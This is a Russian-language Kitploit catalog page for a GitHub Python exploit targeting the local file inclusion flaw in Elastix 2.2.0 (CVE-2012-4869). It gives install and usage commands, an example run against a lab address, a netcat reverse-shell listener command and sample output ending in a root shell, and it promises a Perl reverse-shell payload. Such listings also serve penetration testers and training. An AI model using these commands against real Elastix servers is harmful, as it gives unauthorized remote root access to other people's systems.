Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Elastix-2.2.0-CVE-2012-4869 — Python-скрипт эксплойта для уязвимости LFI Elastix 2.2.0 (CVE-2012-4869), позволяющий удаленное выполнение кода через внедрение Perl reverse shell нагрузки. | Kitploit
Инструменты/GitHubGitHub/cyberdesu/elastix-2.2.0-cve-2012-4869
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubcyberdesu/elastix-2.2.0-cve-2012-4869

Elastix-2.2.0-CVE-2012-4869

Python-скрипт эксплойта для уязвимости LFI Elastix 2.2.0 (CVE-2012-4869), позволяющий удаленное выполнение кода через внедрение Perl reverse shell нагрузки.

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт локального включения файлов Elastix 2.2.0 - CVE-2012-4869

Описание

Этот скрипт эксплуатирует уязвимость локального включения файлов (LFI) в Elastix 2.2.0, позволяя выполнить удалённый код (RCE) путём внедрения команд через конечную точку callme_page.php. Эксплойт основан на CVE-2012-4869.

Возможности

  • Обходит проверку сертификатов TLS.
  • Использует полезную нагрузку обратного шелла на Perl.
  • Поддерживает свои LHOST и LPORT для обратного шелла.
  • Подавляет предупреждения безопасности HTTPS.

Требования

  • Python 3
  • модуль requests

Установите зависимости с помощью:

root@kitploit:~
pip install requests

Использование

root@kitploit:~
python exploit.py <URL> --LHOST <YOUR_IP> --LPORT <YOUR_PORT>

Пример:

root@kitploit:~
python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001

Настройка прослушивателя обратного шелла

Перед запуском эксплойта запустите прослушиватель Netcat на вашей машине:

root@kitploit:~
nc -lvnp 9001

Вывод выполнения эксплойта

root@kitploit:~
[*] Running Elastix 2.2.0 LFI Exploit - CVE-2012-4869
[*] Target: https://10.129.229.183
[*] Listening on 10.10.14.23:9001

[+] Exploit sent successfully, waiting for reverse shell...

[+] Connection from 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)

Примечания

  • Если обратный шелл не подключается, убедитесь, что правила брандмауэра и настройки SELinux разрешают исходящие подключения.
  • Альтернативные полезные нагрузки (например, Bash или Python) могут использоваться, если Perl недоступен.
  • Убедитесь, что ваш LHOST доступен с целевой машины.

Отказ от ответственности

Этот эксплойт предназначен только для образовательного и авторизованного тестирования безопасности. Несанкционированное использование незаконно. Автор не несёт ответственности за неправильное использование этого инструмента.

Скачать инструмент